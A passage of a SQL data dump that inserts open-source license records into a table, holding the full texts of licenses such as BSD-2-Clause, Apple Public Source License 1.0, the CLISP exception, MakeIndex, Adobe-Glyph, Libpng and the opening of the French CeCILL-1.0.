GUI interface, you would use an \"about box\".\n\nYou should also get your employer (if you work as a programmer) or school,\nif any, to sign a \"copyright disclaimer\" for the program, if necessary. For\nmore information on this, and how to apply and follow the GNU GPL, see <http\ns ://www.gnu.org/licenses/>.\n\nThe GNU General Public License does not permit incorporating your program\ninto proprietary programs. If your program is a subroutine library, you may\nconsider it more useful to permit linking proprietary applications with the\nlibrary. If this is what you want to do, use the GNU Lesser General Public\nLicense instead of this License. But first, please read <http s ://www.gnu.org/\nlicenses /why-not-lgpl.html>.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(200,'BSD-2-Clause','Copyright (c) <year> <owner> . All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(201,'APSL-1.0','APPLE PUBLIC SOURCE LICENSE\n\nVersion 1.0 - March 16, 1999 Please read this License carefully before downloading\nthis software. By downloading and using this software, you are agreeing to\nbe bound by the terms of this License. If you do not or cannot agree to the\nterms of this License, please do not download or use the software.\n\n1. General; Definitions. This License applies to any program or other work\nwhich Apple Computer, Inc. (\"Apple\") publicly announces as subject to this\nApple Public Source License and which contains a notice placed by Apple identifying\nsuch program or work as \"Original Code\" and stating that it is subject to\nthe terms of this Apple Public Source License version 1.0 (or subsequent version\nthereof), as it may be revised from time to time by Apple (\"License\"). As\nused in this License:\n\n1.1 \"Applicable Patents\" mean: (a) in the case where Apple is the grantor\nof rights, (i) patents or patent applications that are now or hereafter acquired,\nowned by or assigned to Apple and (ii) whose claims cover subject matter contained\nin the Original Code, but only to the extent necessary to use, reproduce and/or\ndistribute the Original Code without infringement; and (b) in the case where\nYou are the grantor of rights, (i) patents and patent applications that are\nnow or hereafter acquired, owned by or assigned to You and (ii) whose claims\ncover subject matter in Your Modifications, taken alone or in combination\nwith Original Code.\n\n1.2 \"Covered Code\" means the Original Code, Modifications, the combination\nof Original Code and any Modifications, and/or any respective portions thereof.\n\n1.3 \"Deploy\" means to use, sublicense or distribute Covered Code other than\nfor Your internal research and development (R&D), and includes without limitation,\nany and all internal use or distribution of Covered Code within Your business\nor organization except for R&D use, as well as direct or indirect sublicensing\nor distribution of Covered Code by You to any third party in any form or manner.\n\n1.4 \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n1.5 \"Modifications\" mean any addition to, deletion from, and/or change to,\nthe substance and/or structure of Covered Code. When code is released as a\nseries of files, a Modification is: (a) any addition to or deletion from the\ncontents of a file containing Covered Code; and/or (b) any new file or other\nrepresentation of computer program statements that contains any part of Covered\nCode.\n\n1.6 \"Original Code\" means the Source Code of a program or other work as originally\nmade available by Apple under this License, including the Source Code of any\nupdates or upgrades to such programs or works made available by Apple under\nthis License, and that has been expressly identified by Apple as such in the\nheader file(s) of such work.\n\n1.7 \"Source Code\" means the human readable form of a program or other work\nthat is suitable for making modifications to it, including all modules it\ncontains, plus any associated interface definition files, scripts used to\ncontrol compilation and installation of an executable (object code).\n\n1.8 \"You\" or \"Your\" means an individual or a legal entity exercising rights\nunder this License. For legal entities, \"You\" or \"Your\" includes any entity\nwhich controls, is controlled by, or is under common control with, You, where\n\"control\" means (a) the power, direct or indirect, to cause the direction\nor management of such entity, whether by contract or otherwise, or (b) ownership\nof fifty percent (50%) or more of the outstanding shares or beneficial ownership\nof such entity.\n\n2. Permitted Uses; Conditions & Restrictions. Subject to the terms and conditions\nof this License, Apple hereby grants You, effective on the date You accept\nthis License and download the Original Code, a world-wide, royalty-free, non-exclusive\nlicense, to the extent of Apple\'s Applicable Patents and copyrights covering\nthe Original Code, to do the following:\n\n2.1 You may use, copy, modify and distribute Original Code, with or without\nModifications, solely for Your internal research and development, provided\nthat You must in each instance:\n\n(a) retain and reproduce in all copies of Original Code the copyright and\nother proprietary notices and disclaimers of Apple as they appear in the Original\nCode, and keep intact all notices in the Original Code that refer to this\nLicense;\n\n(b) include a copy of this License with every copy of Source Code of Covered\nCode and documentation You distribute, and You may not offer or impose any\nterms on such Source Code that alter or restrict this License or the recipients\'\nrights hereunder, except as permitted under Section 6; and\n\n(c) completely and accurately document all Modifications that you have made\nand the date of each such Modification, designate the version of the Original\nCode you used, prominently include a file carrying such information with the\nModifications, and duplicate the notice in Exhibit A in each file of the Source\nCode of all such Modifications.\n\n 2.2 You may Deploy Covered Code, provided that You must in each instance:\n\n(a) satisfy all the conditions of Section 2.1 with respect to the Source Code\nof the Covered Code;\n\n(b) make all Your Deployed Modifications publicly available in Source Code\nform via electronic distribution (e.g. download from a web site) under the\nterms of this License and subject to the license grants set forth in Section\n3 below, and any additional terms You may choose to offer under Section 6.\nYou must continue to make the Source Code of Your Deployed Modifications available\nfor as long as you Deploy the Covered Code or twelve (12) months from the\ndate of initial Deployment, whichever is longer;\n\n(c) must notify Apple and other third parties of how to obtain Your Deployed\nModifications by filling out and submitting the required information found\nat http://www.apple.com/publicsource/modifications.html; and\n\n(d) if you Deploy Covered Code in object code, executable form only, include\na prominent notice, in the code itself as well as in related documentation,\nstating that Source Code of the Covered Code is available under the terms\nof this License with information on how and where to obtain such Source Code.\n\n3. Your Grants. In consideration of, and as a condition to, the licenses granted\nto You under this License:\n\n(a) You hereby grant to Apple and all third parties a non-exclusive, royalty-free\nlicense, under Your Applicable Patents and other intellectual property rights\nowned or controlled by You, to use, reproduce, modify, distribute and Deploy\nYour Modifications of the same scope and extent as Apple\'s licenses under\nSections 2.1 and 2.2; and\n\n(b) You hereby grant to Apple and its subsidiaries a non-exclusive, worldwide,\nroyalty-free, perpetual and irrevocable license, under Your Applicable Patents\nand other intellectual property rights owned or controlled by You, to use,\nreproduce, execute, compile, display, perform, modify or have modified (for\nApple and/or its subsidiaries), sublicense and distribute Your Modifications,\nin any form, through multiple tiers of distribution.\n\n4. Larger Works. You may create a Larger Work by combining Covered Code with\nother code not governed by the terms of this License and distribute the Larger\nWork as a single product. In each such instance, You must make sure the requirements\nof this License are fulfilled for the Covered Code or any portion thereof.\n\n5. Limitations on Patent License. Except as expressly stated in Section 2,\nno other patent rights, express or implied, are granted by Apple herein. Modifications\nand/or Larger Works may require additional patent licenses from Apple which\nApple may grant in its sole discretion.\n\n6. Additional Terms. You may choose to offer, and to charge a fee for, warranty,\nsupport, indemnity or liability obligations and/or other rights consistent\nwith the scope of the license granted herein (\"Additional Terms\") to one or\nmore recipients of Covered Code. However, You may do so only on Your own behalf\nand as Your sole responsibility, and not on behalf of Apple. You must obtain\nthe recipient\'s agreement that any such Additional Terms are offered by You\nalone, and You hereby agree to indemnify, defend and hold Apple harmless for\nany liability incurred by or claims asserted against Apple by reason of any\nsuch Additional Terms.\n\n7. Versions of the License. Apple may publish revised and/or new versions\nof this License from time to time. Each version will be given a distinguishing\nversion number. Once Original Code has been published under a particular version\nof this License, You may continue to use it under the terms of that version.\nYou may also choose to use such Original Code under the terms of any subsequent\nversion of this License published by Apple. No one other than Apple has the\nright to modify the terms applicable to Covered Code created under this License.\n\n8. NO WARRANTY OR SUPPORT. The Original Code may contain in whole or in part\npre-release, untested, or not fully tested works. The Original Code may contain\nerrors that could cause failures or loss of data, and may be incomplete or\ncontain inaccuracies. You expressly acknowledge and agree that use of the\nOriginal Code, or any portion thereof, is at Your sole and entire risk. THE\nORIGINAL CODE IS PROVIDED \"AS IS\" AND WITHOUT WARRANTY, UPGRADES OR SUPPORT\nOF ANY KIND AND APPLE AND APPLE\'S LICENSOR(S) (FOR THE PURPOSES OF SECTIONS\n8 AND 9, APPLE AND APPLE\'S LICENSOR(S) ARE COLLECTIVELY REFERRED TO AS \"APPLE\")\nEXPRESSLY DISCLAIM ALL WARRANTIES AND/OR CONDITIONS, EXPRESS OR IMPLIED, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES AND/OR CONDITIONS OF MERCHANTABILITY\nOR SATISFACTORY QUALITY AND FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT\nOF THIRD PARTY RIGHTS. APPLE DOES NOT WARRANT THAT THE FUNCTIONS CONTAINED\nIN THE ORIGINAL CODE WILL MEET YOUR REQUIREMENTS, OR THAT THE OPERATION OF\nTHE ORIGINAL CODE WILL BE UNINTERRUPTED OR ERROR-FREE, OR THAT DEFECTS IN\nTHE ORIGINAL CODE WILL BE CORRECTED. NO ORAL OR WRITTEN INFORMATION OR ADVICE\nGIVEN BY APPLE OR AN APPLE AUTHORIZED REPRESENTATIVE SHALL CREATE A WARRANTY\nOR IN ANY WAY INCREASE THE SCOPE OF THIS WARRANTY. You acknowledge that the\nOriginal Code is not intended for use in the operation of nuclear facilities,\naircraft navigation, communication systems, or air traffic control machines\nin which case the failure of the Original Code could lead to death, personal\ninjury, or severe physical or environmental damage.\n\n 9. Liability.\n\n9.1 Infringement. If any of the Original Code becomes the subject ofa claim\nof infringement (\"Affected Original Code\"), Apple may, at its sole discretion\nand option: (a) attempt to procure the rights necessary for You to continue\nusing the Affected Original Code; (b) modify the Affected Original Code so\nthat it is no longer infringing; or (c) terminate Your rights to use the Affected\nOriginal Code, effective immediately upon Apple\'s posting of a notice to such\neffect on the Apple web site that is used for implementation of this License.\n\n9.2 LIMITATION OF LIABILITY. UNDER NO CIRCUMSTANCES SHALL APPLE BE LIABLE\nFOR ANY INCIDENTAL, SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES ARISING OUT\nOF OR RELATING TO THIS LICENSE OR YOUR USE OR INABILITY TO USE THE ORIGINAL\nCODE, OR ANY PORTION THEREOF, WHETHER UNDER A THEORY OF CONTRACT, WARRANTY,\nTORT (INCLUDING NEGLIGENCE), PRODUCTS LIABILITY OR OTHERWISE, EVEN IF APPLE\nHAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES AND NOTWITHSTANDING THE\nFAILURE OF ESSENTIAL PURPOSE OF ANY REMEDY. In no event shall Apple\'s total\nliability to You for all damages under this License exceed the amount of fifty\ndollars ($50.00).\n\n10. Trademarks. This License does not grant any rights to use the trademarks\nor trade names \"Apple\", \"Apple Computer\", \"Mac OS X\", \"Mac OS X Server\" or\nany other trademarks or trade names belonging to Apple (collectively \"Apple\nMarks\") and no Apple Marks may be used to endorse or promote products derived\nfrom the Original Code\n\nother than as permitted by and in strict compliance at all times with Apple\'s\nthird party trademark usage guidelines which are posted at http://www.apple.com/legal/guidelinesfor3rdparties.html.\n\n11. Ownership. Apple retains all rights, title and interest in and to the\nOriginal Code and any Modifications made by or on behalf of Apple (\"Apple\nModifications\"), and such Apple Modifications will not be automatically subject\nto this License. Apple may, at its sole discretion, choose to license such\nApple Modifications under this License, or on different terms from those contained\nin this License or may choose not to license them at all. Apple\'s development,\nuse, reproduction, modification, sublicensing and distribution of Covered\nCode will not be subject to this License.\n\n 12. Termination.\n\n12.1 Termination. This License and the rights granted hereunder will terminate:\n\n(a) automatically without notice from Apple if You fail to comply with any\nterm(s) of this License and fail to cure such breach within 30 days of becoming\naware of such breach;\n\n(b) immediately in the event of the circumstances described in Sections 9.1\nand/or 13.6(b); or\n\n(c) automatically without notice from Apple if You, at any time during the\nterm of this License, commence an action for patent infringement against Apple.\n\n12.2 Effect of Termination. Upon termination, You agree to immediately stop\nany further use, reproduction, modification and distribution of the Covered\nCode, or Affected Original Code in the case of termination under Section 9.1,\nand to destroy all copies of the Covered Code or Affected Original Code (in\nthe case of\n\ntermination under Section 9.1) that are in your possession or control. All\nsublicenses to the Covered Code which have been properly granted prior to\ntermination shall survive any termination of this License. Provisions which,\nby their nature, should remain in effect beyond the termination of this License\nshall survive, including but not limited to Sections 3, 5, 8, 9, 10, 11, 12.2\nand 13. Neither party will be liable to the other for compensation, indemnity\nor damages of any sort solely as a result of terminating this License in accordance\nwith its terms, and termination of this License will be without prejudice\nto any other right or remedy of either party.\n\n 13. Miscellaneous.\n\n13.1 Export Law Assurances. You may not use or otherwise export or re-export\nthe Original Code except as authorized by United States law and the laws of\nthe jurisdiction in which the Original Code was obtained. In particular, but\nwithout limitation, the Original Code may not be exported or re-exported (a)\ninto (or to a national or resident of) any U.S. embargoed country or (b) to\nanyone on the U.S. Treasury Department\'s list of Specially Designated Nationals\nor the U.S. Department of Commerce\'s Table of Denial Orders. By using the\nOriginal Code, You represent and warrant that You are not located in, under\ncontrol of, or a national or resident of any such country or on any such list.\n\n13.2 Government End Users. The Covered Code is a \"commercial item\" as defined\nin FAR 2.101. Government software and technical data rights in the Covered\nCode include only those rights customarily provided to the public as defined\nin this License. This customary commercial license in technical data and software\nis provided in\n\naccordance with FAR 12.211 (Technical Data) and 12.212 (Computer Software)\nand, for Department of Defense purchases, DFAR 252.227-7015 (Technical Data\n-- Commercial Items) and 227.7202-3 (Rights in Commercial Computer Software\nor Computer Software Documentation). Accordingly, all U.S. Government End\nUsers acquire Covered Code with only those rights set forth herein.\n\n13.3 Relationship of Parties. This License will not be construed as creating\nan agency, partnership, joint venture or any other form of legal association\nbetween You and Apple, and You will not represent to the contrary, whether\nexpressly, by implication, appearance or otherwise.\n\n13.4 Independent Development. Nothing in this License will impair Apple\'s\nright to acquire, license, develop, have others develop for it, market and/or\ndistribute technology or products that perform the same or similar functions\nas, or otherwise compete with, Modifications, Larger Works, technology or\nproducts that You may develop, produce, market or distribute.\n\n13.5 Waiver; Construction. Failure by Apple to enforce any provision of this\nLicense will not be deemed a waiver of future enforcement of that or any other\nprovision. Any law or regulation which provides that the language of a contract\nshall be construed against the drafter will not apply to this License.\n\n13.6 Severability. (a) If for any reason a court of competent jurisdiction\nfinds any provision of this License, or portion thereof, to be unenforceable,\nthat provision of the License will be enforced to the maximum extent permissible\nso as to effect the economic benefits and intent of the parties, and the remainder\nof this License will continue in full force and effect. (b) Notwithstanding\nthe foregoing, if applicable law prohibits or restricts You from fully and/or\nspecifically complying with Sections 2 and/or 3 or prevents the enforceability\nof either of those Sections, this License will immediately terminate and You\nmust immediately discontinue any use of the Covered Code and destroy all copies\nof it that are in your possession or control.\n\n13.7 Dispute Resolution. Any litigation or other dispute resolution between\nYou and Apple relating to this License shall take place in the Northern District\nof California, and You and Apple hereby consent to the personal jurisdiction\nof, and venue in, the state and federal courts within that District with respect\nto this License. The application of the United Nations Convention on Contracts\nfor the International Sale of Goods is expressly excluded.\n\n13.8 Entire Agreement; Governing Law. This License constitutes the entire\nagreement between the parties with respect to the subject matter hereof. This\nLicense shall be governed by the laws of the United States and the State of\nCalifornia, except that body of California law concerning conflicts of law.\n\nWhere You are located in the province of Quebec, Canada, the following clause\napplies: The parties hereby confirm that they have requested that this License\nand all related documents be drafted in English. Les parties ont exige que\nle present contrat et tous les documents connexes soient rediges en anglais.\nEXHIBIT A.\n\n\"Portions Copyright (c) 1999 Apple Computer, Inc. All Rights Reserved. This\nfile contains Original Code and/or Modifications of Original Code as defined\nin and that are subject to the Apple Public Source License Version 1.0 (the\n\'License\'). You may not use this file except in compliance with the License.\nPlease obtain a copy of the License at http://www.apple.com/publicsource and\nread it before using this file.\n\nThe Original Code and all software distributed under the License are distributed\non an \'AS IS\' basis, WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED,\nAND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, INCLUDING WITHOUT LIMITATION,\nANY WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT.\nPlease see the License for the specific language governing rights and limitations\nunder the License.\"\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(202,'CLISP-exception-2.0','Summary:\n\nThis program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation; see file GNU-GPL.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\nNote:\n\nThis copyright does NOT cover user programs that run in CLISP and third-party packages not part of CLISP, if a) They only reference external symbols in CLISP\'s public packages that define API also provided by many other Common Lisp implementations (namely the packages COMMON-LISP, COMMON-LISP-USER, KEYWORD, CLOS, GRAY, EXT), i.e. if they don\'t rely on CLISP internals and would as well run in any other Common Lisp implementation. Or b) They only reference external symbols in CLISP\'s public packages that define API also provided by many other Common Lisp implementations (namely the packages COMMON-LISP, COMMON-LISP-USER, KEYWORD, CLOS, GRAY, EXT) and some external, not CLISP specific, symbols in third-party packages that are released with source code under a GPL compatible license and that run in a great number of Common Lisp implementations, i.e. if they rely on CLISP internals only to the extent needed for gaining some functionality also available in a great number of Common Lisp implementations. Such user programs are not covered by the term \"\"\"\"derived work\"\"\"\" used in the GNU GPL. Neither is their compiled code, i.e. the result of compiling them by use of the function COMPILE-FILE. We refer to such user programs as \"\"\"\"independent work\"\"\"\".\n\nYou may copy and distribute memory image files generated by the function SAVEINITMEM, if it was generated only from CLISP and independent work, and provided that you accompany them, in the sense of section 3 of the GNU GPL, with the source code of CLISP - precisely the same CLISP version that was used to build the memory image -, the source or compiled code of the user programs needed to rebuild the memory image (source code for all the parts that are not independent work, see above), and a precise description how to rebuild the memory image from these.\n\nForeign non-Lisp code that is linked with CLISP or loaded into CLISP through dynamic linking is not exempted from this copyright. I.e. such code, when distributed for use with CLISP, must be distributed under the GPL.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(203,'MakeIndex','MakeIndex Distribution Notice\n\n11/11/1989\n\nCopyright (C) 1989 by Chen & Harrison International Systems, Inc.\n\nCopyright (C) 1988 by Olivetti Research Center\n\nCopyright (C) 1987 by Regents of the University of California\n\nAuthor:\n\nPehong Chen (phc@renoir.berkeley.edu)\n\nChen & Harrison International Systems, Inc.\n\nPalo Alto, California\n\nUSA\n\nPermission is hereby granted to make and distribute original copies of this\nprogram provided that the copyright notice and this permission notice are\npreserved and provided that the recipient is not asked to waive or limit his\nright to redistribute copies as allowed by this permission notice and provided\nthat anyone who receives an executable form of this program is granted access\nto a machine-readable form of the source code for this program at a cost not\ngreater than reasonable reproduction, shipping, and handling costs. Executable\nforms of this program distributed without the source code must be accompanied\nby a conspicuous copy of this permission notice and a statement that tells\nthe recipient how to obtain the source code.\n\nPermission is granted to distribute modified versions of all or part of this\nprogram under the conditions above with the additional requirement that the\nentire modified work must be covered by a permission notice identical to this\npermission notice. Anything distributed with and usable only in conjunction\nwith something derived from this program, whose useful purpose is to extend\nor adapt or add capabilities to this program, is to be considered a modified\nversion of this program under the requirement above. Ports of this program\nto other systems not supported in the distribution are also considered modified\nversions. All modified versions should be reported back to the author.\n\nThis program is distributed with no warranty of any sort. No contributor accepts\nresponsibility for the consequences of using this program or for whether it\nserves any particular purpose.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(204,'Adobe-Glyph','Copyright (c) 1997,1998,2002,2007 Adobe Systems Incorporated\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this documentation file to use, copy, publish, distribute, sublicense,\nand/or sell copies of the documentation, and to permit others to do the same,\nprovided that:\n\n- No modification, editing or other alteration of this document is allowed;\nand\n\n- The above copyright notice and this permission notice shall be included\nin all copies of the documentation.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this documentation file, to create their own derivative works from the\ncontent of this document to use, copy, publish, distribute, sublicense, and/or\nsell the derivative works, and to permit others to do the same, provided that\nthe derived work is not represented as being a copy or version of this document.\n\nAdobe shall not be liable to any party for any loss of revenue or profit or\nfor indirect, incidental, special, consequential, or other similar damages,\nwhether based on tort (including without limitation negligence or strict liability),\ncontract or other legal or equitable grounds even if Adobe has been advised\nor had reason to know of the possibility of such damages. The Adobe materials\nare provided on an \"AS IS\" basis. Adobe specifically disclaims all express,\nstatutory, or implied warranties relating to the Adobe materials, including\nbut not limited to those concerning merchantability or fitness for a particular\npurpose or non-infringement of any third party rights regarding the Adobe\nmaterials.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(205,'Libpng','This copy of the libpng notices is provided for your convenience. In case\nof any discrepancy between this copy and the notices in the file png.h that\nis included in the libpng distribution, the latter shall prevail.\n\nCOPYRIGHT NOTICE, DISCLAIMER, and LICENSE:\n\nIf you modify libpng you may insert additional notices immediately following\nthis sentence.\n\nThis code is released under the libpng license.\n\nlibpng versions 1.2.6, August 15, 2004, through 1.4.5, December 9, 2010, are\nCopyright (c) 2004, 2006-2010 Glenn Randers-Pehrson, and are distributed according\nto the same disclaimer and license as libpng-1.2.5 with the following individual\nadded to the list of Contributing Authors\n\nCosmin Truta\n\nlibpng versions 1.0.7, July 1, 2000, through 1.2.5 - October 3, 2002, are\n\nCopyright (c) 2000-2002 Glenn Randers-Pehrson, and are distributed according\nto the same disclaimer and license as libpng-1.0.6 with the following individuals\nadded to the list of Contributing Authors\n\nSimon-Pierre Cadieux\n\nEric S. Raymond\n\nGilles Vollant\n\nand with the following additions to the disclaimer:\n\nThere is no warranty against interference with your enjoyment of the library\nor against infringement. There is no warranty that our efforts or the library\nwill fulfill any of your particular purposes or needs. This library is provided\nwith all faults, and the entire risk of satisfactory quality, performance,\naccuracy, and effort is with the user.\n\nlibpng versions 0.97, January 1998, through 1.0.6, March 20, 2000, are\n\nCopyright (c) 1998, 1999 Glenn Randers-Pehrson, and are distributed according\nto the same disclaimer and license as libpng-0.96, with the following individuals\nadded to the list of Contributing Authors:\n\nTom Lane\n\nGlenn Randers-Pehrson\n\nWillem van Schaik\n\nlibpng versions 0.89, June 1996, through 0.96, May 1997, are\n\nCopyright (c) 1996, 1997 Andreas Digger\n\nDistributed according to the same disclaimer and license as libpng-0.88, with\nthe following individuals added to the list of Contributing Authors:\n\nJohn Bowler\n\nKevin Bracey\n\nSam Bushell\n\nMagnus Holmgren\n\nGreg Roelofs\n\nTom Tanner\n\nlibpng versions 0.5, May 1995, through 0.88, January 1996, are\n\nCopyright (c) 1995, 1996 Guy Eric Schalnat, Group 42, Inc.\n\nFor the purposes of this copyright and license, \"Contributing Authors\" is\ndefined as the following set of individuals:\n\nAndreas Dilger\n\nDave Martindale\n\nGuy Eric Schalnat\n\nPaul Schmidt\n\nTim Wegner\n\nThe PNG Reference Library is supplied \"AS IS\". The Contributing Authors and\nGroup 42, Inc. disclaim all warranties, expressed or implied, including, without\nlimitation, the warranties of merchantability and of fitness for any purpose.\nThe Contributing Authors and Group 42, Inc. assume no liability for direct,\nindirect, incidental, special, exemplary, or consequential damages, which\nmay result from the use of the PNG Reference Library, even if advised of the\npossibility of such damage.\n\nPermission is hereby granted to use, copy, modify, and distribute this source\ncode, or portions hereof, for any purpose, without fee, subject to the following\nrestrictions:\n\n 1. The origin of this source code must not be misrepresented.\n\n2. Altered versions must be plainly marked as such and must not be misrepresented\nas being the original source.\n\n3. This Copyright notice may not be removed or altered from any source or\naltered source distribution.\n\nThe Contributing Authors and Group 42, Inc. specifically permit, without fee,\nand encourage the use of this source code as a component to supporting the\nPNG file format in commercial products. If you use this source code in a product,\nacknowledgment is not required but would be appreciated.\n\nA \"png_get_copyright\" function is available, for convenient use in \"about\"\nboxes and the like:\n\nprintf(\"%s\",png_get_copyright(NULL));\n\nAlso, the PNG logo (in PNG format, of course) is supplied in the files \"pngbar.png\"\nand \"pngbar.jpg (88x31) and \"pngnow.png\" (98x31).\n\nLibpng is OSI Certified Open Source Software. OSI Certified Open Source is\na certification mark of the Open Source Initiative.\n\nGlenn Randers-Pehrson\n\nglennrp at users.sourceforge.net\n\nDecember 9, 2010\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(206,'CECILL-1.0','CONTRAT DE LICENCE DE LOGICIEL LIBRE CeCILL Avertissement\n\nCe contrat est une licence de logiciel libre issue d\'une concertation entre\nses auteurs afin que le respect de deux grands principes préside à sa rédaction:\n\n• d\'une part, sa conformité au droit français, tant au regard du droit de\nla responsabilité civile que du droit de la propriété intellectuelle et de\nla protection qu\'il offre aux auteurs et titulaires des droits patrimoniaux\nsur un logiciel.\n\n• d\'autre part, le respect des principes de diffusion des logiciels libres:\naccès au code source, droits étendus conférés aux utilisateurs.\n\nLes auteurs de la licence CeCILL1 sont:\n\nCommissariat à l\'Energie Atomique – CEA, établissement public de caractère\nscientifique technique et industriel, dont le siège est situé 31-33 rue de\nla Fédération, 75752 PARIS cedex 15.\n\nCentre National de la Recherche Scientifique – CNRS, établissement public\nà caractère scientifique et technologique, dont le siège est situé 3 rue Michel-Ange\n75794 Paris cedex 16.\n\nInstitut National de Recherche en Informatique et en Automatique – INRIA,\nétablissement public à caractère scientifique et technologique, dont le siège\nest situé Domaine de Voluceau, Rocquencourt, BP 105, 78153 Le Chesnay cedex.\n\nPREAMBULE\n\nCe contrat est une licence de logiciel libre dont l\'objectif est de conférer\naux utilisateurs la liberté de modification et de redistribution du logiciel\nrégi par cette licence dans le cadre d\'un modèle de diffusion «open source».\n\nL\'exercice de ces libertés est assorti de certains devoirs à la charge des\nutilisateurs afin de préserver ce statut au cours des redistributions ultérieures.\n\nL\'accessibilité au code source et les droits de copie, de modification et\nde redistribution qui en découlent ont pour contrepartie de n\'offrir aux utilisateurs\nqu\'une garantie limitée et de ne faire peser sur l\'auteur du logiciel, le\ntitulaire des droits patrimoniaux et les concédants successifs qu\'une responsabilité\nrestreinte.\n\nA cet égard l\'attention de l\'utilisateur est attirée sur les risques associés\nau chargement, à l\'utilisation, à la modification et/ou au développement et\nà la reproduction du logiciel par l\'utilisateur étant donné sa spécificité\nde logiciel libre, qui peut le rendre complexe à manipuler et qui le réserve\ndonc à des développeurs et des professionnels avertis possédant des connaissances\ninformatiques approfondies. Les utilisateurs sont donc invités à charger et\ntester l\'adéquation du Logiciel à leurs besoins dans des conditions permettant\nd\'assurer la sécurité de leurs systèmes et ou de leurs données et, plus généralement,\nà l\'utiliser et l\'exploiter dans les même conditions de sécurité. Ce contrat\npeut être reproduit et diffusé librement, sous réserve de le conserver en\nl\'état, sans ajout ni suppression de clauses.\n\nCe contrat est susceptible de s\'appliquer à tout logiciel dont le titulaire\ndes droits patrimoniaux décide de soumettre l\'exploitation aux dispositions\nqu\'il contient.\n\nArticle 1er - DEFINITIONS\n\nDans ce contrat, les termes suivants, lorsqu\'ils seront écrits avec une lettre\ncapitale, auront la signification suivante:\n\nContrat: désigne le présent contrat de licence, ses éventuelles versions postérieures\net annexes.\n\nLogiciel: désigne le logiciel sous sa forme de Code Objet et/ou de Code Source\net le cas échéant sa documentation, dans leur état au moment de l\'acceptation\ndu\n\nContrat par le Licencié.\n\nLogiciel Initial: désigne le Logiciel sous sa forme de Code Source et de Code\nObjet et le cas échéant sa documentation, dans leur état au moment de leur\npremière diffusion sous les termes du Contrat.\n\nLogiciel Modifié: désigne le Logiciel modifié par au moins une Contribution.\n\nCode Source: désigne l\'ensemble des instructions et des lignes de programme\ndu Logiciel et auquel l\'accès est nécessaire en vue de modifier le Logiciel.\n\nCode Objet: désigne les fichiers binaires issus de la compilation du Code\nSource.\n\nTitulaire : désigne le détenteur des droits patrimoniaux d\'auteur sur le Logiciel\nInitial.\n\nLicencié(s): désigne le ou les utilisateur(s) du Logiciel ayant accepté le\nContrat.\n\nContributeur: désigne le Licencié auteur d\'au moins une Contribution.\n\nConcédant: désigne le Titulaire ou toute personne physique ou morale distribuant\nle Logiciel sous le Contrat.\n\nContributions: désigne l\'ensemble des modifications, corrections, traductions,\nadaptations et/ou nouvelles fonctionnalités intégrées dans le Logiciel par\ntout\n\nContributeur, ainsi que les Modules Statiques.\n\nModule: désigne un ensemble de fichiers sources y compris leur documentation\nqui, une fois compilé sous forme exécutable, permet de réaliser des fonctionnalités\nou\n\nservices supplémentaires à ceux fournis par le Logiciel.\n\nModule Dynamique: désigne tout Module, créé par le Contributeur, indépendant\ndu Logiciel, tel que ce Module et le Logiciel sont sous forme de deux exécutables\nindépendants qui s\'exécutent dans un espace d\'adressage indépendant, l\'un\nappelant l\'autre au moment de leur exécution.\n\nModule Statique: désigne tout Module créé par le Contributeur et lié au Logiciel\npar un lien statique rendant leur code objet dépendant l\'un de l\'autre. Ce\nModule et le Logiciel auquel il est lié, sont regroupés en un seul exécutable.\n\nParties: désigne collectivement le Licencié et le Concédant.\n\nCes termes s\'entendent au singulier comme au pluriel.\n\nArticle 2 - OBJET\n\nLe Contrat a pour objet la concession par le Concédant au Licencié d\'une Licence\nnon exclusive, transférable et mondiale du Logiciel telle que définie ci-après\nà l\'article 5 pour toute la durée de protection des droits portant 